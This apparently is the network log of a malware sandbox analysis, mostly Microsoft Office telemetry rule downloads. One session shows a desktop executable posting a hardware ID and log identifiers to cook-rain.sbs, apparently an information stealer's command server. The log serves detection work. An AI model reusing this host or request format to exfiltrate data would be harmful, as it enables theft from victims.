                                                                                                                                                                                                2024-11-20 09:54:23 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                39192.168.2.74974213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:24 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:24 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 478
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                x-ms-request-id: 70a27ff5-201e-0051-4e8c-3a7340000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095424Z-r1d97b99577hc74hhC1TEBvbns00000008e000000000ep9e
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:24 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                40192.168.2.74974313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:24 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:24 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 404
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                x-ms-request-id: feb02638-401e-0067-7b8c-3a09c2000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095424Z-1777c6cb754b7tdghC1TEBwwa400000009kg000000006ecy
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:24 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                41192.168.2.74974513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:24 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:24 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 400
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095424Z-1777c6cb754dqf99hC1TEB5nps00000009b0000000003e3b
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:24 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                42192.168.2.74974413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:24 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:24 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                x-ms-request-id: e83eb970-001e-0046-777e-3ada4b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095424Z-r1d97b9957789g82hC1TEBstx000000008hg00000000dzxx
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:24 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                43192.168.2.749747188.114.96.34437724C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:24 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=5WGRITFA7MSQ3T4K4
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 15076
                                                                                                                                                                                                Host: cook-rain.sbs
                                                                                                                                                                                                2024-11-20 09:54:24 UTC15076OUTData Raw: 2d 2d 35 57 47 52 49 54 46 41 37 4d 53 51 33 54 34 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 38 30 39 43 45 31 42 39 38 30 35 44 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 35 57 47 52 49 54 46 41 37 4d 53 51 33 54 34 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 57 47 52 49 54 46 41 37 4d 53 51 33 54 34 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                                                                                Data Ascii: --5WGRITFA7MSQ3T4K4Content-Disposition: form-data; name="hwid"32809CE1B9805DCB63CFCF7E6C45F838--5WGRITFA7MSQ3T4K4Content-Disposition: form-data; name="pid"2--5WGRITFA7MSQ3T4K4Content-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                                                                                2024-11-20 09:54:25 UTC983INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=srm098ha80uepc6fhg0d7ifj41; expires=Sun, 16-Mar-2025 03:41:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DsLD5WqOazRWXcXnVLvRoPIMSEw2G6FMEZYrhrPdc%2B0%2Fpnr5bsZ7%2FgEIHiZXf5Z91N0Bm50sTI71gQY5e6MSddkBhnj426KYV9SvRJPLiIc4uOHW4RQbQKSgMCm873Fa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e578ef62ca343af-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1749&sent=9&recv=19&lost=0&retrans=1&sent_bytes=4200&recv_bytes=16012&delivery_rate=348448&cwnd=228&unsent_bytes=0&cid=0e765438b9476b17&ts=1131&x=0"
                                                                                                                                                                                                2024-11-20 09:54:25 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                2024-11-20 09:54:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                44192.168.2.74974613.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:24 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:24 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 479
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095424Z-1777c6cb754ww792hC1TEBzqu4000000096000000000ea2g
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:24 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                45192.168.2.74975113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:24 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 448
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                x-ms-request-id: c1a1e3cb-901e-005b-1f8c-3a2005000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095425Z-185f5d8b95c4vwv8hC1NYCy4v40000000a4000000000cer4
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:25 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                46192.168.2.74974813.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:24 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 425
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                x-ms-request-id: 62f36519-501e-0016-468c-3a181b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095425Z-185f5d8b95cf7qddhC1NYC66an0000000a6g000000002kau
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:25 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                47192.168.2.74974913.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:24 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 475
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                x-ms-request-id: 7511d71d-801e-0083-6e8c-3af0ae000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095425Z-185f5d8b95cdh56ghC1NYCk1x400000003zg000000002536
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
